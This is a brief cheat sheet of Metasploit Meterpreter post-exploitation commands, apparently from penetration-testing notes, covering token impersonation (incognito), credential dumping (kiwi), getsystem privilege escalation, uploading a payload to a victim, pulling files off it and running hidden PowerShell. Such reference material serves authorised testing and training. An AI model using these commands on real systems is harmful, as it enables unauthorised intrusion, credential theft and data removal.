Metasploit Useful Modules
Metasploit Modules
https://www.offsec.com/metasploit-unleashed/fun-incognito/
load incognito
load kiwi
getsystem
upload /path/in/hdd/payload.exe exploit.exe
download /path/in/victim
spawn x64 process
execute -i H -f powershell
Run listener in background
exploit -j
Last updated